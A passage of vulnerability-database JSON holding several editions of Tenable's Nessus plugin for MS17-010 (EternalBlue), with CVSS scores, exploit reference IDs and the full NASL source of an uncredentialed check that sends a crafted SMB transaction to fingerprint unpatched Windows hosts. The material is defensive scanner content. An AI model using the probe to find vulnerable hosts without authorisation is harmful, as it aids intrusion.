packet;\n}\n\n\n#\n# MAIN\n#\n\n# Make sure it's Windows \nos = get_kb_item_or_exit(\"Host/OS\");\nif (\"Windows\" >!< os)\n audit(AUDIT_HOST_NOT, \"Windows\"); \n \n# Make sure SMBv1 is enabled\nif (! get_kb_item(\"SMB/SMBv1_is_supported\"))\n exit(0, \"SMB version 1 does not appear to be enabled on the remote host.\"); \n\nif (!smb_session_init(smb2:FALSE)) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nr = NetUseAdd(share:\"IPC$\");\nif (r != 1)\n{\n exit(1, 'Failed to connect to the IPC$ share anonymously.');\n}\n\nfid = 0; # Invalid FID \nsetup = raw_word (w:0x23) + raw_word (w:fid); \n\npacket = my_smb_trans_and_x (setup: setup, transname:\"\\PIPE\\\");\nret = smb_sendrecv (data:packet);\nif (ret)\n status = smb_get_error_code (data:ret);\nelse\n status = NULL;\n\nNetUseDel();\n\nif(! isnull(status))\n{\n if(status == STATUS_INVALID_HANDLE\n || status == STATUS_ACCESS_DENIED # Win 10\n )\n {\n audit(AUDIT_HOST_NOT , \"affected\"); \n }\n else if (status == STATUS_INSUFF_SERVER_RESOURCES)\n {\n port = kb_smb_transport();\n\n report = 'Sent:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(packet)) + '\\n';\n report += 'Received:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(ret));\n\n security_report_v4(port: port, severity: SECURITY_HOLE, extra: report);\n }\n else\n {\n status = \"0x\" + toupper(hexstr(mkdword(status)));\n audit(AUDIT_RESP_BAD, port, \"an SMB_COM_TRANSACTION request. Status code: \" + status);\n }\n}\nelse\n{\n exit(1, \"Failed to get response status for an SMB_COM_TRANSACTION request.\"); \n}\n", "naslFamily": "Windows", "cpe": ["cpe:/o:microsoft:windows"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2020-10-16T07:45:32", "differentElements": ["cvss2", "cvss3"], "edition": 5}, {"bulletin": {"id": "MS17-010.NASL", "hash": "fb5d6541669f2547786f75e0f3909d00", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)", "description": "The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.", "published": "2017-03-20T00:00:00", "modified": "2017-03-20T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://www.tenable.com/plugins/nessus/97833", "reporter": "This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?8dcab5e4", "http://www.nessus.org/u?4c7e0cf3", "http://www.nessus.org/u?321523eb", "http://www.nessus.org/u?d9f569cf", "http://www.nessus.org/u?234f8ef8", "https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/", "https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?68fc8eff", "http://www.nessus.org/u?59db5b5b", "http://www.nessus.org/u?b9d9ebf9", "http://www.nessus.org/u?065561d0"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0199", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-07-29T01:33:11", "history": [], "viewCount": 7142, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:F48CAEEE-E809-405D-B7AD-48D94140C67D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:146236"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92935", "SSV:92952", "SSV:92964"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0199"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96705", "SMNTC-96704", "SMNTC-96706", "SMNTC-96707", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "fireeye", "idList": ["FIREEYE:ABF21A18BEF0ABDDD461684446C0A772", "FIREEYE:37C92D78C4F9986624FA2FB49CBCB764", "FIREEYE:E77EEC61CF4FE2F4BDB43A5A0C15A644", "FIREEYE:8CFA7797EC0BA31DD1AD30C4C7EE1BED"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "avleonov", "idList": ["AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"]}, {"type": "myhack58", "idList": ["MYHACK58:62201785189", "MYHACK58:62201786827", "MYHACK58:62201786816", "MYHACK58:62201785268", "MYHACK58:62201786371", "MYHACK58:62201785243", "MYHACK58:62201785331"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}], "modified": "2021-07-29T01:33:11", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-07-29T01:33:11", "rev": 2}}, "objectVersion": "1.6", "pluginID": "97833", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97833);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/15\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)\");\n script_summary(english:\"Checks the presence of MS17-010.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n # https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?68fc8eff\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/\");\n # https://support.microsoft.com/en-us/help/2696547/how-to-detect-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b9d9ebf9\");\n # https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8dcab5e4\");\n # https://www.theregister.co.uk/2017/01/18/uscert_warns_admins_to_kill_smb_after_shadow_brokers_dump/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?234f8ef8\");\n # https://www.riskbasedsecurity.com/2016/08/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c7e0cf3\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft\nrecommends that users discontinue the use of SMBv1. SMBv1 lacks\nsecurity features that were included in later SMB versions. SMBv1 can\nbe disabled by following the vendor instructions provided in Microsoft\nKB2696547. Additionally, US-CERT recommends that users block SMB\ndirectly by blocking TCP port 445 on all network boundary devices. For\nSMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137\n/ 138 on all network boundary devices.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"smb_v1_enabled_remote.nasl\");\n script_require_keys(\"Host/OS\", \"SMB/SMBv1_is_supported\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\n\nfunction smb_get_error_code (data)\n{\n local_var header, flags2, code;\n\n # Some checks in the header first\n header = get_smb_header (smbblob:data);\n if (!header)\n return NULL;\n\n flags2 = get_header_flags2 (header:header);\n if (flags2 & SMB_FLAGS2_32BIT_STATUS)\n {\n code = get_header_nt_error_code (header:header);\n }\n else\n {\n code = get_header_dos_error_code (header:header);\n }\n\n return code;\n}\n\n\nfunction my_smb_trans_and_x (setup, transname, param, data, max_pcount, max_dcount)\n{\n local_var header, parameters, dat, packet, ret, pad1, trans, p_offset, d_offset, plen, dlen, slen, pad2, npad;\n\n npad = pad1 = pad2 = NULL;\n\n if (session_is_unicode () == 1)\n trans = cstring (string:transname);\n else\n trans = transname;\n\n header = smb_header (Command: SMB_COM_TRANSACTION,\n Status: nt_status (Status: STATUS_SUCCESS));\n\n p_offset = 32 + 1 + 28 + strlen(setup) + 2 + strlen(trans);\n\n # Unicode transname should be aligned to 2 byte \n if(session_is_unicode() == 1)\n {\n npad = crap(data:'\\x00', length: (2 - p_offset % 2) % 2);\n p_offset += strlen(npad);\n }\n\n # Parameter is aligned to 4 byte\n pad1 = crap(data:'\\x00', length: (4 - p_offset % 4) % 4);\n p_offset += strlen(pad1);\n\n # Data is aligned to 4 byte\n d_offset = p_offset + strlen (param);\n pad2 = crap(data:'\\x00', length: (4 - d_offset % 4) % 4);\n d_offset += strlen(pad2);\n\n plen = strlen(param);\n dlen = strlen(data);\n slen = strlen(setup);\n\n if(isnull(max_pcount)) max_pcount =0xffff;\n if(isnull(max_dcount)) max_dcount =0xffff;\n\n parameters = \n raw_word (w:plen) + # total parameter count\n\t raw_word (w:dlen) + # total data count\n\t raw_word (w:max_pcount) + # Max parameter count\n\t raw_word (w:max_dcount) + # Max data count\n\t raw_byte (b:0) + # Max setup count\n raw_byte (b:0) + # Reserved\n\t raw_word (w:0) + # Flags\n\t raw_dword (d:0) + # Timeout\n\t raw_word (w:0) + # Reserved\n\t raw_word (w:plen) + # Parameter count\n\t raw_word (w:p_offset) + # Parameter offset\n\t raw_word (w:dlen) + # Data count\n\t raw_word (w:d_offset) + # Data offset\n\t raw_byte (b:slen/2) + # Setup count\n\t raw_byte (b:0); # Reserved\n\n parameters += setup;\n\n parameters = smb_parameters (data:parameters);\n\n dat = npad +\n trans +\n pad1 +\n param +\n pad2 +\n data;\n\n dat = smb_data (data:dat);\n\n packet = netbios_packet (header:header, parameters:parameters, data:dat);\n\n return packet;\n}\n\n\n#\n# MAIN\n#\n\n# Make sure it's Windows \nos = get_kb_item_or_exit(\"Host/OS\");\nif (\"Windows\" >!< os)\n audit(AUDIT_HOST_NOT, \"Windows\"); \n \n# Make sure SMBv1 is enabled\nif (! get_kb_item(\"SMB/SMBv1_is_supported\"))\n exit(0, \"SMB version 1 does not appear to be enabled on the remote host.\"); \n\nif (!smb_session_init(smb2:FALSE)) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nr = NetUseAdd(share:\"IPC$\");\nif (r != 1)\n{\n exit(1, 'Failed to connect to the IPC$ share anonymously.');\n}\n\nfid = 0; # Invalid FID \nsetup = raw_word (w:0x23) + raw_word (w:fid); \n\npacket = my_smb_trans_and_x (setup: setup, transname:\"\\PIPE\\\");\nret = smb_sendrecv (data:packet);\nif (ret)\n status = smb_get_error_code (data:ret);\nelse\n status = NULL;\n\nNetUseDel();\n\nif(! isnull(status))\n{\n if(status == STATUS_INVALID_HANDLE\n || status == STATUS_ACCESS_DENIED # Win 10\n )\n {\n audit(AUDIT_HOST_NOT , \"affected\"); \n }\n else if (status == STATUS_INSUFF_SERVER_RESOURCES)\n {\n port = kb_smb_transport();\n\n report = 'Sent:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(packet)) + '\\n';\n report += 'Received:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(ret));\n\n security_report_v4(port: port, severity: SECURITY_HOLE, extra: report);\n }\n else\n {\n status = \"0x\" + toupper(hexstr(mkdword(status)));\n audit(AUDIT_RESP_BAD, port, \"an SMB_COM_TRANSACTION request. Status code: \" + status);\n }\n}\nelse\n{\n exit(1, \"Failed to get response status for an SMB_COM_TRANSACTION request.\"); \n}\n", "naslFamily": "Windows", "cpe": ["cpe:/o:microsoft:windows"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-07-29T01:33:11", "differentElements": ["cvelist", "cvss2", "cvss3", "cvssScoreSource", "description", "exploitAvailable", "exploitEase", "exploitableWith", "modified", "patchPublicationDate", "references", "solution", "vpr", "vulnerabilityPublicationDate"], "edition": 6}, {"bulletin": {"id": "MS17-010.NASL", "hash": "4e35886d67fc5235c64bbc01af40f3d3", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)", "description": "The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-20T00:00:00", "modified": "2020-10-15T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97833", "reporter": "This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://www.nessus.org/u?d9f569cf", "http://www.nessus.org/u?234f8ef8", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/", "http://www.nessus.org/u?59db5b5b", "http://www.nessus.org/u?321523eb", "http://www.nessus.org/u?8dcab5e4", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "http://www.nessus.org/u?68fc8eff", "https://github.com/stamparm/EternalRocks/", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://www.nessus.org/u?065561d0", "http://www.nessus.org/u?b9d9ebf9", "http://www.nessus.org/u?4c7e0cf3"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-08-11T13:59:25", "history": [], "viewCount": 7142, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142602", "PACKETSTORM:154690", "PACKETSTORM:142603", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:42030"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "nessus", "idList": ["SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0147"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96703", "SMNTC-96709", "SMNTC-96706", 